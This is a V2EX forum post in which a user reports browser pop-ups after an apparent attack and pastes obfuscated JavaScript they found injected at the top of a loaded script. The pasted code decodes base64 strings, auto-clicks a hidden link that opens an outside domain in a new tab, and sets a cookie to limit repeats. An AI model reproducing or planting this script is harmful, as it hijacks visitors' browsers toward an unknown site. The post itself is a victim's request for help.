离了个大谱,被 D 后,打开网页会有弹窗。
清理缓存,经过 F12 ,发现首个加载的 JS 开头会被插入一段代码,
屏蔽所有 JS 后没有问题。
扫描了一下未发现病毒。
SSL 下也无解,这该从何处入手呢。
var _0x3402 = ['dGFyZ2V0', 'YXBwZW5kQ2hpbGQ=', 'aHR0cHM6Ly8za2R2NTh4ay5pYnRvYzN0Ny5jb20=', 'Y2xpY2s=', 'RE9NQ29udGVudExvYWRlZA==', 'b2tr', 'X2JsYW5r', 'Y29va2ll', 'Ym9keQ==', 'MTIz', 'a2tmZnM=', 'd2FmX3NjPTU4ODk2NDc3MjY7ZXhwaXJlcz0=', 'd2FmX3NjPTU4ODk2NDc3MjY=', 'cmFuZG9t', 'Z2V0VGltZQ=='];
(function(_0x4f678f, _0x3402d3) {
var _0x22dcf8 = function(_0x48d0ed) {
while (--_0x48d0ed) {
_0x4f678f['push'](_0x4f678f['shift']());
}
};
_0x22dcf8(++_0x3402d3);
}(_0x3402, 0x1b1));
var _0x22dc = function(_0x4f678f, _0x3402d3) {
_0x4f678f = _0x4f678f - 0x0;
var _0x22dcf8 = _0x3402[_0x4f678f];
if (_0x22dc['YbLqLE'] === undefined) {
(function() {
var _0x55fb65;
try {
var _0x99ff51 = Function('return\x20(function()\x20' + '{}.constructor(\x22return\x20this\x22)(\x20)' + ');');
_0x55fb65 = _0x99ff51();
} catch (_0x186283) {
_0x55fb65 = window;
}
var _0x245ad6 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';
_0x55fb65['atob'] || (_0x55fb65['atob'] = function(_0x45ea70) {
var _0x373e1f = String(_0x45ea70)['replace'](/=+$/, '');
var _0x474828 = '';
for (var _0x25b404 = 0x0, _0x4e134e, _0x51471c, _0x109a80 = 0x0; _0x51471c = _0x373e1f['charAt'](_0x109a80++); ~_0x51471c && (_0x4e134e = _0x25b404 % 0x4 ? _0x4e134e * 0x40 + _0x51471c : _0x51471c,
_0x25b404++ % 0x4) ? _0x474828 += String['fromCharCode'](0xff & _0x4e134e >> (-0x2 * _0x25b404 & 0x6)) : 0x0) {
_0x51471c = _0x245ad6['indexOf'](_0x51471c);
}
return _0x474828;
}
);
}());
_0x22dc['pzRRBR'] = function(_0x2f9082) {
var _0x4ab614 = atob(_0x2f9082);
var _0x28b9ef = [];
for (var _0x40b68a = 0x0, _0xc5670f = _0x4ab614['length']; _0x40b68a < _0xc5670f; _0x40b68a++) {
_0x28b9ef += '%' + ('00' + _0x4ab614['charCodeAt'](_0x40b68a)['toString'](0x10))['slice'](-0x2);
}
return decodeURIComponent(_0x28b9ef);
}
;
_0x22dc['GHNzVI'] = {};
_0x22dc['YbLqLE'] = !![];
}
var _0x48d0ed = _0x22dc['GHNzVI'][_0x4f678f];
if (_0x48d0ed === undefined) {
_0x22dcf8 = _0x22dc['pzRRBR'](_0x22dcf8);
_0x22dc['GHNzVI'][_0x4f678f] = _0x22dcf8;
} else {
_0x22dcf8 = _0x48d0ed;
}
return _0x22dcf8;
};
function addiframe() {
var _0x22998d = document['createElement']('a');
_0x22998d['href'] = _0x22dc('0x4');
_0x22998d[_0x22dc('0x2')] = _0x22dc('0x8');
document[_0x22dc('0xa')][_0x22dc('0x3')](_0x22998d);
_0x22998d[_0x22dc('0x5')]();
setTimeout(()=>document[_0x22dc('0xa')]['removeChild'](_0x22998d), 0x1f40);
}
function setcookie() {
var _0x3a43d1 = new Date();
_0x3a43d1['setTime'](_0x3a43d1[_0x22dc('0x1')]() + 0x18 * 0x3 * 0x3c * 0x3c * 0x3e8);
var _0x504815 = document[_0x22dc('0x9')]['indexOf'](_0x22dc('0xe'));
if (_0x504815 < 0x0 && document[_0x22dc('0x7')] == null) {
document[_0x22dc('0x7')] = _0x22dc('0xb');
document['addEventListener'](_0x22dc('0x6'), function(_0x301b98) {
if (document[_0x22dc('0xc')] == null) {
document[_0x22dc('0xc')] = _0x22dc('0xb');
var _0x5d8a65 = Math['floor'](Math[_0x22dc('0x0')]() * 0x64) + 0x1;
if (_0x5d8a65 <= 0x64) {
document[_0x22dc('0x9')] = _0x22dc('0xd') + _0x3a43d1['toGMTString']();
addiframe();
}
}
});
}
}
setcookie();
这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。
V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。
V2EX is a community of developers, designers and creative people.